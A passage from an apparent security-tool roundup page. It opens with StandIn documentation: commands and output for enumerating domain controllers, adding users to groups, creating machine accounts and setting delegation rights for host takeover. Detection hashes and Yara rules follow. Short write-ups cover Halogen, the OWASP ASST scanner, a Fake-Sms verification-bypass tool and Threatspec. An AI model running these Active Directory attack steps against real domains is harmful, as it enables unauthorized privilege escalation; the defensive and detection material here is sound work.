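protocol_transition = (
    f"(userAccountControl:{BIT_AND}:={TRUSTED_TO_AUTH_FOR_DELEGATION})"
)
rbcd_inbound = "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)"

print(unconstrained)
# (userAccountControl:1.2.840.113556.1.4.803:=524288)
```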

DC's

Use Case

This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments.


Syntax

Get all domain controllers.

C:\> StandIn.exe --dc

[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local

[*] Host : m-w16-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.5
OSVersion : Windows Server 2016 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17
Role : SchemaRole
NamingRole
PdcRole
RidRole
InfrastructureRole

[*] Host : m-w19-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.13
OSVersion : Windows Server 2019 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17

Groups Operations

These functions deal specifically with domain groups.


List group membership

Use Case

This function provides situational awareness, listing all members of a domain group including their type (user or nested group).


Syntax

Enumerate group membership and provide rudimentary details for the member objects.

C:\> StandIn.exe --group "Server Admins"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : Server Admins
GUID : 92af8954-58cc-4fa4-a9ba-69bfa5524b5c

[+] Members

[?] Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : Workstation Admins
Type : Group
SID : S-1-5-21-1293271031-3053586410-2290657902-1108

[?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin001
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1111

[?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin002
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1184

[?] Path : LDAP://CN=Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin003
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1185

[?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin004
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1186

[?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin005
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1187

[?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : SimCritical
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1204

Add user to group

Use Case

With appropriate access, the operator can add an NTAccount to a domain group.


Syntax

Add an NTAccount identifier to a domain group. Normally this would be a user, but it could also be a group.

C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --group lowprivbutmachineaccess --ntaccount "MAIN\user001"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Adding user to group
|_ Success

C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : user001
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1106

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

Machine Object Operations

These functions are specifically for machine operations and expect the machine name as input.


Create machine object

Use Case

The operator may wish to create a machine object in order to perform a resource-based constrained delegation attack. By default, any domain user can create up to 10 machine accounts on the local domain.


Syntax

Create a new machine object with a random password; the ms-DS-MachineAccountQuota limit applies to this operation.

C:\> StandIn.exe --computer M-1337-b33f --make

[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local
|_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local
|_ Password : MlCGkaacS5SRUOt

[+] Machine account added to AD..

The ms-DS-MachineAccountQuota property exists on the domain root object. If you need to verify the quota, you can perform an object search as shown below.

C:\> StandIn.exe --object ms-DS-MachineAccountQuota=*
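A sketch of the attributes a minimal machine object carries at creation; the helper, the domain suffix, and the 15-character password length are illustrative (the length matches the sample output above), and StandIn performs the actual LDAP add itself:

```python
import secrets
import string

WORKSTATION_TRUST_ACCOUNT = 0x1000  # userAccountControl for workstations

def new_machine_attributes(name: str, domain: str) -> dict:
    """Assemble the core attributes for a new machine account with a
    random alphanumeric password (hypothetical helper)."""
    alphabet = string.ascii_letters + string.digits
    return {
        "sAMAccountName": f"{name}$",  # machine account names end in $
        "dNSHostName": f"{name.lower()}.{domain}",
        "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
        "password": "".join(secrets.choice(alphabet) for _ in range(15)),
    }

attrs = new_machine_attributes("M-1337-b33f", "main.redhook.local")
print(attrs["sAMAccountName"])  # M-1337-b33f$
```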

Disable machine object

Use Case

Standard users do not have the ability to delete a machine object; however, a user that created a machine can thereafter disable that machine object.


Syntax

Disable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects, only disable them.

C:\> StandIn.exe --computer M-1337-b33f --disable

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account currently enabled
|_ Account disabled..

Delete machine object

Use Case

With elevated AD privileges, the operator can delete a machine object, such as one created earlier in the attack chain.


Syntax

Use an elevated context to delete a machine object.

C:\> StandIn.exe --computer M-1337-b33f --delete

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account deleted from AD

Add msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object, this function allows the operator to add an msDS-AllowedToActOnBehalfOfOtherIdentity property to the machine, which is required to perform a resource-based constrained delegation attack.


Syntax

Add an msDS-AllowedToActOnBehalfOfOtherIdentity property to the machine along with a SID to facilitate host takeover using resource-based constrained delegation.

C:\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity

C:\> StandIn.exe --object samaccountname=m-10-1909-03$

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount
|_ 107
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195771
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-03
[+] badpasswordtime
|_ 7/9/2020 5:07:11 PM UTC
[+] pwdlastset
|_ 10/29/2020 6:44:08 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-03
|_ TERMSRV/m-10-1909-03.main.redhook.local
|_ WSMAN/m-10-1909-03
|_ WSMAN/m-10-1909-03.main.redhook.local
|_ RestrictedKrbHost/M-10-1909-03
|_ HOST/M-10-1909-03
|_ RestrictedKrbHost/m-10-1909-03.main.redhook.local
|_ HOST/m-10-1909-03.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 10/29/2020 12:29:26 PM UTC
[+] usncreated
|_ 31127
[+] objectguid
|_ c02cff97-4bfd-457c-a568-a748b0725c2f
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 5:05:08 PM
[+] adspath
|_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-03
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:55:14 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-03.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/30/2020 10:55:22 AM
|_ 10/29/2020 4:58:51 PM
|_ 10/29/2020 4:58:29 PM
|_ 1/1/1601 12:00:01 AM
[+] lastlogon
|_ 11/2/2020 9:07:20 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-03$
[+] objectsid
|_ S-1-5-21-1293271031-3053586410-2290657902-1127
[+] lastlogoff
|_ 0
[+] msds-allowedtoactonbehalfofotheridentity
|_ BinLen : 36
|_ AceQualifier : AccessAllowed
|_ IsCallback : False
|_ OpaqueLength : 0
|_ AccessMask : 983551
|_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205
|_ AceType : AccessAllowed
|_ AceFlags : None
|_ IsInherited : False
|_ InheritanceFlags : None
|_ PropagationFlags : None
|_ AuditFlags : None
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF

Remove msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object this function allows the operator to remove a previously added msDS-AllowedToActOnBehalfOfOtherIdentity property from the machine.


Syntax

Remove previously created msDS-AllowedToActOnBehalfOfOtherIdentity property from a machine.

C:\> StandIn.exe --computer m-10-1909-03 --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

Detection

This section outlines a number of IOCs that can aid in the detection engineering process for StandIn.


Release Package Hashes

The following table maps the release package hashes for StandIn.

-=v0.8=-
StandIn_Net35.exe SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3
MD5: 8C942EE4553E40A7968FF0C8DC5DB9AB

StandIn_Net45.exe SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681
MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9

-=v0.7=-
StandIn_Net35.exe SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0
MD5: 50D29F7597BF83D80418DEEFD360F093

StandIn_Net45.exe SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A
MD5: 4E5258A876ABCD2CA2EF80E0D5D93195
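To verify a downloaded release against the table above, the hashes can be recomputed with a short stdlib script (a sketch; the path argument is whichever release binary you have on disk):

```python
import hashlib

def file_hashes(path, chunk_size=65536):
    """Compute SHA256 and MD5 of a file in streaming fashion."""
    sha256, md5 = hashlib.sha256(), hashlib.md5()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            sha256.update(chunk)
            md5.update(chunk)
    return sha256.hexdigest().upper(), md5.hexdigest().upper()

# Example: compare against the v0.8 values listed above, e.g.
# sha256, md5 = file_hashes("StandIn_Net35.exe")
```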

Yara

The following Yara rules can be used to detect StandIn on disk, in its default form.

rule StandIn
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn string constants."

strings:
$s1 = "StandIn" ascii wide nocase
$s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase
$s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase
$s4 = ">--~~--> Args? <--~~--<" ascii wide nocase

condition:
all of ($s*)
}
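The rule above fires only when all four strings are present. As a quick sanity check without a Yara runtime, the same condition can be approximated in a few lines of Python (this only approximates Yara's ascii/wide/nocase matching; it is not a replacement for a real Yara scan):

```python
# String constants from the StandIn Yara rule above.
STRINGS = [
    b"StandIn",
    b"(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))",
    b"msDS-AllowedToActOnBehalfOfOtherIdentity",
    b">--~~--> Args? <--~~--<",
]

def matches_standin_rule(data: bytes) -> bool:
    """Approximate the 'all of ($s*)' condition: every string must appear,
    in either its ascii or its UTF-16LE (wide) encoding, ignoring case."""
    lowered = data.lower()  # bytes.lower() lowercases ASCII letters only
    for s in STRINGS:
        ascii_hit = s.lower() in lowered
        wide_hit = s.decode().lower().encode("utf-16-le") in lowered
        if not (ascii_hit or wide_hit):
            return False
    return True
```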

rule StandIn_PDB
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn default PDB."

strings:
$s1 = "\\Release\\StandIn.pdb" ascii wide nocase

condition:
all of ($s*)
}

SilktETW Microsoft-Windows-DotNETRuntime Yara Rule

The Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the Microsoft-Windows-DotNETRuntime ETW data provider. For testing purposes, this rule can be directly evaluated using SilkETW. It should be noted that this is a generic example rule; production alerting would require a more granular approach.

rule Silk_StandIn_Generic
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."

strings:
$s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase
$s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase

condition:
any of them
}


Halogen - Automatically Create YARA Rules From Malicious Documents



Halogen is a tool to automate the creation of yara rules against image files embedded within a malicious document.


Halogen help
python3 halogen.py -h
usage: halogen.py [-h] [-f FILE] [-d DIR] [-n NAME] [--png-idat] [--jpg-sos]

Halogen: Automatically create yara rules based on images embedded in office
documents.

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File to parse
-d DIR, --directory DIR
directory to scan for image files.
-n NAME, --rule-name NAME
specify a custom name for the rule file
--png-idat For PNG matches, instead of starting with the PNG file
header, start with the IDAT chunk.
--jpg-sos For JPG matches, skip over the header and look for the
Start of Scan marker, and begin the match there.

Testing it out

We've included some test document files with embedded images for you to test this out with. Running python3 halogen/halogen.py -d tests/ > /tmp/halogen_test.yara will produce the test yara file containing all images found within the files inside the tests/ directory.
From here you can run yara -s /tmp/halogen_test.yara tests/ and observe which images match which files.


Notes
  1. We use two patterns for JPG matching. One is less strict than the typical JPG file header; we use it because we've seen some malicious files use this format. If Halogen finds both, it defaults to writing out the stricter match. Typically these have the same matching content, so no detection is really missed.
  2. For PNG files you can choose to start by default at the file header, or with --png-idat you can start at the IDAT chunk found within a PNG file. We also reduced the bytes returned when matching on the IDAT chunk.
  3. Similar to the above, you can start JPG matches at the Start of Scan marker by using the --jpg-sos flag.
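The --png-idat behaviour described in note 2 depends on locating the IDAT chunk inside the PNG structure. A minimal stdlib sketch of that chunk walk (an illustration of the format, not Halogen's actual code):

```python
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def find_idat_offset(data: bytes):
    """Walk PNG chunks (4-byte big-endian length, 4-byte type, payload,
    4-byte CRC) and return the offset of the first IDAT type field, or None."""
    if not data.startswith(PNG_MAGIC):
        return None
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        if ctype == b"IDAT":
            return pos + 4          # offset where an IDAT-anchored match starts
        pos += 8 + length + 4       # skip header, payload and CRC
    return None
```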

Contributing

Please contribute pull requests in python3, and submit any bugs you find as issues.



OWASP ASST (Automated Software Security Toolkit) - A Novel Open Source Web Security Scanner



OWASP ASST (Automated Software Security Toolkit) | A Novel Open Source Web Security Scanner.

Note: AWSS is the older name of ASST


Introduction

Web applications have become an integral part of everyday life, but many of these applications are deployed with critical vulnerabilities that can be fatally exploited. As the technology used to develop these applications becomes more sophisticated, so do attackers’ techniques. Attackers no longer need physical access to their victims, they can attack many targets at the same time, and the possibility of being caught and brought to justice is minimal. Automated web vulnerability scanners have been heavily used to assess the security of web applications. They can improve the efficiency of vulnerability scanning compared to traditional manual vulnerability detection, which is time-consuming, labor-intensive, and inefficient. There are many web vulnerability scanners on the Internet; however, they do not explain the possible attacks or how to implement countermeasures against them. We designed and implemented a new automated web vulnerability scanner called Automated Software Security Toolkit (ASST), which scans a web project’s source code and generates a report of the results with a detailed explanation of each possible vulnerability and how to secure against it. We have tested the performance of ASST and compared its results with other major open source vulnerability scanners. Our results show that ASST can identify web software security vulnerabilities more comprehensively and accurately.

NOTE: It is still under development. Please report any errors you encounter.


What is ASST?

ASST is an Open Source, Source Code Scanning Tool, it is a CLI (Command Line Interface) application, developed with JavaScript (Node.js framework).

Currently it concentrates on PHP and MySQL, but since its core functionality is ready and available to everyone, programmers can contribute plugins or extensions to make it scan other programming languages such as Java, C#, Python, etc., and their frameworks. Its infrastructure is designed to be open to contributions from other programmers to make it better.

To the best of our knowledge, ASST is the only tool that scans PHP according to the OWASP Top 10 Web Application Security Risks.


How Does ASST Teach Developers to Secure Their Code?

When ASST scans a project, it checks every file line by line for security vulnerabilities. If a vulnerability is detected, the report alerts at which line in which file the vulnerability was found, with a "Click Here" link that explains the attack and how to secure against it.

ASST's results are shown as an HTML report linked with PDF files that explain each attack and its protection mechanism.
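The line-by-line scanning model can be sketched as a toy scanner (a hypothetical example pattern, not ASST's actual rule set) that flags PHP lines where raw request input appears inside a query call:

```python
import re

# Hypothetical rule: a PHP superglobal carrying user input on a query line.
SQLI_PATTERN = re.compile(r"\$(?:_GET|_POST|_REQUEST)\b")

def scan_lines(source: str):
    """Return (line_number, line) pairs for every line that both builds a
    query and embeds raw request input -- the classic SQL injection shape."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if "query" in line.lower() and SQLI_PATTERN.search(line):
            findings.append((lineno, line.strip()))
    return findings
```

A real scanner would additionally track data flow across lines; this sketch only shows the per-line reporting shape described above.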


How to Contribute?
  • ASST can easily be extended to support other programming languages to be scanned for vulnerabilities. The project is open source; therefore, programmers with expertise in cyber security can contribute to or fork the toolkit and add features. Other programming languages such as Python, C#, Java or Node.js itself can be added to be scanned for vulnerabilities as backend server code.

  • If you are a security-experienced developer, you can contribute to make the current version better, or you can contribute by adding new programming languages to be scanned. However, there are rules that need to be followed while improving it:

  1. The core code shouldn’t be changed, although you can suggest better code, or new code to be added if its need is well justified.
  2. A specific language’s core code can be changed if it can be made better.
  3. If you want to add a new language, you need to follow the same code design and file structure of the project.

How to install and run it?

For ASST to work fully, you will need to install:

  1. localhost on your PC, we recommend (XAMPP).
  2. Node.js Engine v12.13.0
  • The best usage of ASST is to run it directly on the online production server and scan the project(s) there, because ASST also checks whether the server's PHP and MySQL versions are outdated.

A) Install ASST On Windows

Full Video of how to run ASST on Windows: https://youtu.be/FKxDa3zYz1E


1. XAMPP on Windows

You can download XAMPP for windows from here: https://www.apachefriends.org/download.html choose the version of PHP that suits your project, if you don't know which version to pick, just pick the first one for windows.

After downloading and installing XAMPP (Next, Next, Next, Finish), run XAMPP Control Panel, you can type XAMPP in Start Menu Search Field then you will see it, run it, Next To Apache and MySQL labels press start (two buttons).


PS:
  1. Make sure your PC doesn't have a virtual machine program installed, because XAMPP and virtual machines conflict over ports; you will have to force close the VM background services using Task Manager (Google it if you don't know what I am talking about).

  2. Make sure Skype is closed (even from the tray bar), because it also conflicts over ports; you can run Skype after you start XAMPP.

Place your Project's folder in htdocs: default: "C:\xampp\htdocs\YourProjectFolderName"

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "" (Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on Windows

You must download a specific version of Node.js for windows from here: https://nodejs.org/en/blog/release/v12.13.0/ select (Windows 64-bit Installer), then download, Next, Next, Next and Finish.

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can download latest node.js version from here: https://nodejs.org/en/download/ choose (Windows Installer (.msi)), download and run it, Next, Next, Next and Finish.


PS: Downloading latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on Windows

Download and Extract ASST's project from this github page, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "C:\xampp\htdocs\ASST"


Configurations:
  1. Open config.js inside ASST's folder and set the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

Double click ASST.bat to run it. If it gets blocked by Windows Defender SmartScreen, allow it by clicking More Info and then Run or Run Anyway, or just run it using a CMD command.

default CMD command to run ASST:

$ node C:\xampp\htdocs\ASST\main.js


B) Install ASST On Linux (Ubuntu)

Full Video of how to run ASST on Ubuntu: https://youtu.be/XrAB8_BHxfo


1. XAMPP on Ubuntu

Using a web browser, open this link: https://www.apachefriends.org/download.html and look for "XAMPP for Linux" section, choose the PHP version that suits your project and download it, if you don't know which version to pick, just pick the first one. Or you can download XAMPP through terminal using "wget" command(tool), but you will need to have and know the correct url version to download.

Now working in Terminal:

$ cd Downloads

$ ls

You should see the XAMPP setup file you downloaded.

$ sudo chmod +x xampp-linux-*

$ sudo ./xampp-linux-*

Wait a second for the setup to run, then follow the instructions. After downloading and installing XAMPP, run it.

$ sudo /opt/lampp/lampp start

Place your Project's folder in htdocs: default: "/opt/lampp/htdocs/YourProjectFolderName"

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "" (Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on Ubuntu

$ sudo apt-get install nodejs -y

$ sudo apt-get install npm -y

You must set a specific version of Node.js to let ASST work without any problems.

$ sudo npm install n -g

$ sudo n 12.13.0

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can ignore the last two commands of installing "n" using npm


PS: Using latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on Ubuntu

Download and Extract ASST's project from this github page, using a browser, wget or git, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "/opt/lampp/htdocs/ASST"


Configurations:
  1. Open config.js inside ASST's folder using nano, vim or text editor and set the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

To run ASST, default command:

$ sudo node /opt/lampp/htdocs/ASST/main.js


C) Install ASST On MacOSX

Full Video of how to run ASST on MacOSX: https://youtu.be/IThRZEQVa7M


1. XAMPP on MacOSX

Using a web browser, open this link: https://www.apachefriends.org/download.html and look for "XAMPP for OSX" section, choose the PHP version that suits your project and download it, if you don't know which version to pick, just pick the first one.

Open Downloads Folder and double click on the xampp-osx-.dmg file you downloaded. then install: Next, Next, Next, Finish.

After installation, open Applications Folder using Finder and open XAMPP folder, click on manager-osx.app to open XAMPP Control Panel, click on Manage Servers tab then click Start All button.

Place your Project's folder in htdocs:

  1. Using Finder, open Applications then navigate to XAMPP folder then htdocs, then place your Project there.
  2. You can use terminal: default location /Applications/XAMPP/htdocs/YourProjectFolderName

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "",(Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on MacOSX

There are several ways to download and install Node.js on MacOSX specified here: https://nodejs.org/en/download/package-manager/#macos

We used: brew (package system), Open Terminal:

$ sudo /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"

$ sudo brew install node

You must set a specific version of Node.js to let ASST work without any problems.

$ sudo npm install n -g

$ sudo n 12.13.0

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can ignore the last two commands of installing "n" using npm


PS: Using the latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on MacOSX

Download and Extract ASST's project from this github page, using a browser or git, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "/Applications/XAMPP/htdocs/ASST"


Configurations:
  1. Open config.js inside ASST's folder using text editor, put the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

To run ASST, default command:

$ sudo node /Applications/XAMPP/htdocs/ASST/main.js


Special Thanks

Special Thanks to:

  1. Assist. Prof. Dr. Ece Gelal Soyak: https://scholar.google.com.tr/citations?user=w-RBj5QAAAAJ&hl=en
  2. Assist. Prof. Dr. Selçuk Baktır: https://scholar.google.com/citations?user=iwR7YF8AAAAJ&hl=en
  3. Assist. Prof. Dr. Özgül Küçük: https://scholar.google.com/citations?user=qJJSkrAAAAAJ&hl=en
  4. OWASP Foundation

For making this toolkit possible by providing their guidance and help.



Fake-Sms - A Simple Command Line Tool Using Which You Can Skip Phone Number Based SMS Verification By Using A Temporary Phone Number That Acts Like A Proxy



A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.

Note-1: This is just an experimental tool; do not use it for any banking transactions. Unethical use of this tool is strongly discouraged.

Note-2: The tool uses upmasked, a European service provider; data will be stored on their servers, so make sure you agree to EU data governance laws and the GDPR. I recommend not using this for any personal transaction that reveals your identity.


Features:
  • Written in Go-1.15 (with modules support enabled)
  • Provides an interactive CLI, which is easier to use.
  • Provides a local file-based DB to save and manage a list of fake phone numbers to help you remember and reuse them.
  • Unofficial client of upmasked

Requirements:
  • Go programming language - 1.15+

To build:

The build process is simple, it is just like building any other Go module. Follow the steps below:

export GOBIN=$PWD/bin
go install

This will build the binary and place it in bin/. You can also consider using the pre-built binary which is available under bin/


Steps to use:
  1. Register a number in local DB: You can register a number by selecting one of the available numbers as shown below.


  2. Get the messages from any registered number: You can select a number which was saved in step 1 and view its messages as a list. The tool will also save the dump as JSON in the file ${PWD}/selected-phone-number.json. As shown below:


  3. Optionally, you can choose to delete the remembered numbers or list them.

Acknowledgements

A similar tool is also available as a pure shell script. Check this out.


Contributing

The tool is very simple and I don't think any major feature is missing, but I would welcome any suggestions, enhancements or bug fixes from the community. Please open an issue to discuss, or directly make a PR!



Threatspec - Continuous Threat Modeling, Through Code



Threatspec is an open source project that aims to close the gap between development and security by bringing the threat modelling process further into the development process. This is achieved by having developers and security engineers write threat modeling annotations as comments inside source code, then dynamically generating reports and data-flow diagrams from the code. This allows engineers to capture the security context of the code they write, as they write it. In a world of everything-as-code, this can include infrastructure-as-code, CI/CD pipelines, and serverless etc. in addition to traditional application code.


Getting started

Step 1 - Install threatspec
$ pip install threatspec

You'll also need to install Graphviz for the report generation.


Step 2 - Initialise threatspec in your code repository
$ threatspec init
Initialising threatspec...

Threatspec has been initialised. You can now configure the project in this
repository by editing the following file:

threatspec.yaml

You can configure threatspec by editing the threatspec.yaml configuration file which looks something like this:

# This file contains default configuration for a threatspec-enabled repository
# Warning: If you delete this file, threatspec will treat this directory as a normal source path if referenced by other threatspec.yaml files.

project:
name: "threatspec project" # Name of your project. This might be you application name or a friendly name for the code repository.
description: "A threatspec project." # A description of the project. This will be used in the markdown report as well as the name.
imports: # Import other threatspec projects into this one.
- './' # Current directory isn't strictly necessary as this is processed anyway. Just here as an example.
paths: # Source code paths to process
- './' # Parse source files in the current directory by default.
